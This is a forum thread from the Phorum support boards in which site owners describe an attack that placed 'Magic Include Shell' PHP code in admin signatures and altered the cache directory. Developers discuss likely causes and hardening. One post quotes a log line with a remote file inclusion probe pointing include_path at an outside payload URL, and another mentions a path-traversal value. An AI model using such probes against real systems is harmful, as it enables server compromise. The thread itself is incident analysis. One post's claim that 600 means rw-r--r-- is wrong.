Phorum hack attempt: "Magic Include Shell"

My phorums have all been semi-hacked with someone managing to change the admin user's signature to be a 46779 byte string of PHP code. This gets written to Phorum's cache directory, and then displayed each time the user elects to show their sig on a post.

Now this on its own is not critical, although it does show the MD5 of the password to the public, as well as various other user data.

However, I'd very much like to know how they hacked the signature in the first place.

I have the full script, including version number and author's ICQ if any Phorum devs would like me to send it to them.
Any advice on how to quickly secure my Phorum 5.1.25 install against someone changing signatures again would be appreciated too - I realise I need to upgrade to the latest version but that simply isn't possible for the next few days at least.

Thanks for any help,

/\dam

--
My notable Phorum sites:
Movie Deaths Database - "review comments" system mostly powered by Phorum
Learn Chinese! - integrated forum quiz

More information - another setting was also accessed: the cache_directory was changed from /tmp to ../../../../../../../tmp
- Presumably using the same vulnerability that allowed the sig to be overridden.

/\dam

--
My notable Phorum sites:
Movie Deaths Database - "review comments" system mostly powered by Phorum
Learn Chinese! - integrated forum quiz

There are no security bugs in Phorum that we know of, so it's hard to make a guess here about what happened.

One thing could be that your admin account got ripped. You should make a copy of your webserver access logs (and errors logs if you have them), to prevent them from getting lost. Then check the logs to see if there is access requests to admin.php in there that do not come from familiar IP addresses.

Search your user database and see if there are users with admin = 1 which you did not make administrator.

Another thing could be that some other application that you run suffers from SQL injection problems. Are you on a shared hosting system? Then it could even be that a website on the same server has a problem (depending on the hosting provider's clue for security, neighbour website access might allow access to your files, making it possible to read the include/db/config.php too for example). What does your full website look like? Any other applications running or only Phorum? Shared? Dedicated?

---

Maurice Makaay
Phorum Development Team
my blog linkedin profile secret sauce

Hi Maurice,
If you search Google for phorum "magic include" there is at least one other Phorum other than myself that has suffered from the same attack (that search brings back one result, which isn't my forum).

All three of my forums have been hit inside of a few days. They are each running on a different server. I can't obviously guarantee my admin accounts weren't ripped, but I am running the "Admin Security Suite" module with admin logging and can't see any suspicious logins (I know the hack happened in the past few days, and I hadn't logged into the admin for a good month prior to that).

I've checked and no other users have been made admins. In fact, each of my sites only has myself as an admin, which is also the first user in the users table (unsurprisingly).

Also, I have to say that if someone did have my admin password, I fear they would have caused far more mischief than just changing my sig to a PHP script that won't run.

An SQL injection is equally difficult to rule out, but again - with the power to overwrite *any* data, I have to say I think there would be more damage.

To me, this looks like an automated attack to which my install is unfortunately vulnerable to. I am on shared "virtual" hosting, with all three servers running a variety of sites. I'm pretty careful though - even my Phorum installs have no attachment uploads enabled for any users.

Anyway, I hope this information is useful to you, even just as an instance of an unconfirmed hack. If you do think of any way that signature and cache_directory could be overwritten for the admin user, please feel free to contact me privately and I'll be as cooperative as I can to let you run some tests.

Cheers,

/\dam

--
My notable Phorum sites:
Movie Deaths Database - "review comments" system mostly powered by Phorum
Learn Chinese! - integrated forum quiz

Quote

If you search Google for phorum "magic include" there is at least one other Phorum other than myself that has suffered from the same attack (that search brings back one result, which isn't my forum).

That does not tell me much. It does certainly not tell us that it would be a Phorum hack. If you search for "magic include shell", you get a lot more entries, none of them really targeted at a specific system. Phorum is not vulnerable for this magic shell attack as far as we know, because the code would not be included and run. But somehow the attacker succeeded in putting the magic shell code in your signature and in changing the cache dir, trying to put the magic shell in your system.

• signature: could be overwritten if the attacker could trick the admin user (or any other user) into posting a pre-built form with the signature data for the control center. This is a session riding trick. But I doubt that this would be the case here. After being tricked, the control center would show with the updated signature. You would have clearly noticed that. Another option would be changing it from the admin interface user management system. You have not seen suspicious admin logins, so that is not it. Last option would be an SQL injection.
• cache dir: can only be changed from the admin interface. There are no other parts of Phorum that write to that setting. Therefore this one can only be done by either logging into the admin and changing it or using an SQL injection. The fact that you did not see any suspicious logins to the admin points also lets this one point at an SQL injection.

So to me, this thing is breathing SQL injection all over. For Phorum, I am pretty sure that SQL injection is not an issue. All database queries run through the DB layer code, which is contained in one file and which was 100% rewritten for Phorum 5.2, including a really really really paranoid approach to handling data that was sent to the layer. While doing so, we found one hard to exploit SQL injection in the old code and a few possible injections which were cancelled because the core code that was using the DB layer already sanitized the input data. This whole paranoid approach makes me very sure that the SQL injection has to be found somewhere else.

The fact that you got a piece of PHP script in your signature tells me that the hacker was not specifically targeting the Phorum software. Phorum does not write the signature to a file to include it. Instead, it uses a template that prints out the signature. There is no way that this is ever going to allow PHP code in signatures to execute. There are some other web packages that make / have made this mistake, so for those this would work. So this is most probably some automated attack script that is trying to find tables with signature fields in them, to load them with code. The fact that there's ICQ info in the script makes it even more likely that it's automated. The attacker is just waiting for systems that will PM him about a hack being succesful.

The cache dir change is stupid as can be too. /tmp is most likeltthe same as ../../../../../../../tmp. Often, packages would have tmp directories that are relative to the install path of the software. Using the ../../../ trick is to escape that path and fall back to the /tmp directory. The attacker is possibly capable of putting files in /tmp, which could be included by the application. However, for Phorum this path is absolute already and a thinking hacker would not have changed this setting. To me this also points at automatic attack attempts.

Quote

An SQL injection is equally difficult to rule out, but again - with the power to overwrite *any* data, I have to say I think there would be more damage.

That there is no more harm being done is not a sign that it is not an SQL injection problem. There is no correlation between the amount of damage that a hacker does and the kind of hack that was used. I've seen many hacks on customer software for sites that are hosted on our webservers. It varied between file permission problems, causing entire sites to be swept clean (site admins who made *all* files chmodded to 777, so any user on the system could delete them, simple hack) and sites being reported as leak (e.g. a complicated permission escalation issue, which could be used to raise user level access to the admin level, quite complicated but no harm done).

Quote

To me, this looks like an automated attack to which my install is unfortunately vulnerable to. I am on shared "virtual" hosting, with all three servers running a variety of sites. I'm pretty careful though - even my Phorum installs have no attachment uploads enabled for any users.

Shared hosting is always a big risk for security. What is the file permission for your include/db/config.php? If some other website got hacked on the system, it could be that they scanned the system for well known db configuration files. If they found yours, there is a big chance that it could be read and used. It's a small step from there to doing SQL queries on your data. It's not even SQL injection then. It's just running standard SQL queries.

Not allowing file uploads is not a security issue for Phorum really. The files are not stored on the file system and are all retrieved through the file.php script. File upload problems only occur when people implement stupid file upload schemes where they allow uploaded files to live in the web root somewhere, where they can be downloaded directory. The biggest problem there is sites that allow any file upload, including *.php files, which would not be downloaded, yet executed by the webserver when opening them in the browser.

---

Maurice Makaay
Phorum Development Team
my blog linkedin profile secret sauce

Thanks Maurice, I've changed my DB passwords.
I pretty much agree with all you say about "Magic Include" - as I originally said, I just really want to know how they changed my signature. If you think an SQL injection is most likely I'm not going to argue.

I know there is nothing inherently unsafe about Phorum's or any other app's upload capability, I was just making the point that I am quite paranoid and don't allow access to my servers unless needed :-)

It would be nice to have a dedicated server, but that is highly unlikely to happen unless some of my sites start making a lot of revenue, rather than barely breaking even...

Thanks for all your helpful thoughts,

/\dam

--
My notable Phorum sites:
Movie Deaths Database - "review comments" system mostly powered by Phorum
Learn Chinese! - integrated forum quiz

You are welcome.

The problem with shared hosting is that one leaky site can open up the others as well. You might want to discuss this with your hosting provider, to see if they have a solution for you to make sure that other sites cannot read your data. If the php scripts for your site run under a specific userid (and not one generic userid for the full site), then the file permissions can be changed to only let your website read the config for example. Sometimes, the sites run under the same userid as the user that can upload files. In that case, you could set the config.php permission to 600 (rw-r--r--). I guess you could test that one easily enough. Just do it and see if the site breaks. If it does not, then it is a safe and smart thing to do.

---

Maurice Makaay
Phorum Development Team
my blog linkedin profile secret sauce

My servers have a particular user that is used by PHP. I have my config.php set to be in this user's group (not owned by them).
The permissions are rwx r-- --- (740)
I'm not sure why I gave execute permission, probably force of habit.

As far as I know my data is locked away from other users - certainly I can't access any files other than in my own virtual environment. If the root server was compromised I realise all my data would be open though.

/\dam

--
My notable Phorum sites:
Movie Deaths Database - "review comments" system mostly powered by Phorum
Learn Chinese! - integrated forum quiz

I think I will add a check on the config.php file permissions into my Admin Security Suite. It would flag if the permissions are set too high.

---

Joe Curia (aka Azumandias)
Modules: l0Admin Mass Email00000000l000000Automatic Time Zones000ll.l00000Enhanced Custom Profiles0.00Google Calendar0000l.l000000Post Previews
000000000Admin Security Suite000000000000Check Modules for Upgrades0000External Authentication000000Group Auto-Email00000.00000Private Message Alerts
000000000Attachment Download Counter0000Custom Attachment Icons000ll.ll00Favorite Forums000000.00000Highlighted Search Terms0000Self-Delete Posts Option
000000000Attachment Watermarks0l00000000Custom Language Database00l.l.0Forum Lockdown00000.00000Ignore Forums0000000000000Threaded Tree View
000000000Automatic Message Pruning00.llll.00Easy Color Scheme Manager0l.l00Forum Subscriptions0000lll000Moderated User Group
Templates:lGeneric Integration000000000 0000Simple Rounded000000 00000000Tabbed Emerald

Great idea, thanks!

/\

--
My notable Phorum sites:
Movie Deaths Database - "review comments" system mostly powered by Phorum
Learn Chinese! - integrated forum quiz

Hi,
I'm the same probleme as sheik.
My adress forum is (http://www.klub-beskid.com/phorum/) (version 5.1.22)

I'm am the log from my server.

78.111.68.37 [14/Jul/2008:17:17:37 +0200] "GET /phorum//admin/actions/del.php?include_path=http://lei.crt-limousin.fr/ortl/lag/id.txt?? HTTP/1.1" 403 239 "-" "libwww-perl/5.805"

and after

220.196.42.221 [14/Jul/2008:19:02:34 +0200] "POST /phorum/admin.php HTTP/1.0" 200 55970 "[www.klub-beskid.com]; "Opera"

I'm change any password, and administrator name

I'm change in table phorum_users the champ signature text by varchar 100

Are you any idea ?

Thank

so what is the exact issue you got?

Quote

78.111.68.37 [14/Jul/2008:17:17:37 +0200] "GET /phorum//admin/actions/del.php?include_path=http://lei.crt-limousin.fr/ortl/lag/id.txt?? HTTP/1.1" 403 239 "-" "libwww-perl/5.805"

that file doesn't exist in phorum5 and the "attacker" got a 403 forbidden error nonetheless.

Quote

220.196.42.221 [14/Jul/2008:19:02:34 +0200] "POST /phorum/admin.php HTTP/1.0" 200 55970 "[www.klub-beskid.com]; "Opera"

Looks like a regular admin login.

Quote

I'm change in table phorum_users the champ signature text by varchar 100

I'm not sure what that means.

---

Thomas Seifert

That URL is not a valid Phorum URL. It is just a some random guess attempt to scan for remote inclusion vulnerabilities on your site. It is scripted using Perl, since libwww was the client that was used. The webserver returned a 403 error (permission denied) as the response. Therefore it did not perform any actions except logging the permission denied error in the server log. Sometimes, hackers put specific codes in logfiles and try to include the logfile afterwards through a hack to executed their injected codes, but this URL is not vulnerable for such attack.

In total: I don't think that this requested page is related to your Phorum being hacked.

---

Maurice Makaay
Phorum Development Team
my blog linkedin profile secret sauce

Thank all
My admin user's signature was changing by a php code. It's the same problème as sheik.
I search in log

this seems to be quite a problem, as a simple google search reveals. In fact, as there are many phorums which appear to have been hacked (mine was too), it is very likely that there is (or at least was) in fact a security problem with Phorum - these are phorums from all over the world, hosted on different servers, so it is not really probable they all share a common external vulnerability.

I would strongly advise not to take this lightly, even if it seems that up to now the attack is not really successful (as the signature is not executed). If an attacker is already able to change signatures and phorum settings, he might learn sooner or later how to do some real damage, too.

As for the actual "Magic Include Shell" (no need to include it here, as it can be retrieved by google search above), it seems that it was written for Wordpress - there are some checks of $wp_version, calls to functions like wp_generate_auth_cookie() and similar things which refer to WP.

So it might be that this is an attack against Wordpress, which gets applied against phorum by mistake or carelessness of the attackers. In this case, checking which vulnerability was used in the respective attacks against Wordpress might give some hints as to why this is possible against Phorum, too.



Edited 1 time(s). Last edit at 01/30/2009 05:37PM by jguerdon.

We do not dispute all that. I feel a bit offended by the insinuation that we take this lightly. All of the Phorum team are very security aware and we have put * a lot * of effort in trying to find what happened on these forums. Mainly to either rule out Phorum's blame in all this or to find a Phorum security hole that we could fix. Unfortunately, we cannot do any coroner activities on systems that are not under our control. It is virtually impossible to blindly start guessing what kind of hack was used. The only thing that we know is that the type of hack is totally useless against Phorum. That is the very reason to not be worried that the hack is done through Phorum itself. A hacker would not go through all the effort to finally deliver a useless hack in the end. Hackers are smarter than that.

Why hacks in other systems are possible against Phorum too is simple. Once an attacker gains access to a database, anything for any application can be changed, as far as the application stores its data in the database. Securing Phorum against that is simple. Create a separate database and database user for Phorum and configure that. That effectively separates the Phorum database from other applications. It's what I do with all my web applications that need db access: run them in separate db's under separate users. When you get hacked in such case, you can be sure about the application that got hacked. When using the same database, there is no sure lead whatsoever.

If you have reasons to believe that Phorum has a security hole that was abused, then please provide some proof other than suspicions. Thank you.

---

Maurice Makaay
Phorum Development Team
my blog linkedin profile secret sauce

I had an attack attempt on one of my servers - and the admin signature was changed to include the magic shell.
Fortunately this was not successful - only the signature was affected - but the script was not executed.

This forum has its own mysql username and database - so an exploit from another program injecting sql is unlikely.

I need to upgrade a few different phorums - so I just need to check :
- Does anyone know a version number that would have stopped the admin's signature being hijacked? (It is possible that an old version of phorum was mistakenly left on the server alongside a 5.1 version - and that the signature was hacked via the old version)

We are still not sure what route was taken to change the signature, so we don't know with what version, if ever, the issue got fixed. Recently, we have gotten some bug reports about CSRF attack possibilities. Maybe that kind of attack was used to trick Phorum into changing the signatures. I'm not yet sure that it's really a Phorum hack though, since changing the signatures does not work for Phorum. When it were a Phorum specific hack, then I'd make sure that my hack would have effect, if I were the hacker.

What we do know, is that the upcoming 5.2 stable release is the most secure version that we know of. In older versions, there might still be issues lingering around, because changes are not backported to old releases.

---

Maurice Makaay
Phorum Development Team
my blog linkedin profile secret sauce

Does anyone know how this hack is done? I't just happened to me, on an old Phorum, not worthwhile to upgrade it, but don't want to take it down, (old political site, issue settled, but it's entertaining to see some old timers come back insult each other). But would be nice to plug the hole, if there is one.

Upgrade your Phorum if you want to keep it running, it is worthwhile to upgrade. This is the only sane advice possible.

We cannot tell you what exact issue caused this. I do not think that we ever found out the exact hole that was used for the magic include shell stuff, but we are sure that several possible holes were patched.

---

Maurice Makaay
Phorum Development Team
my blog linkedin profile secret sauce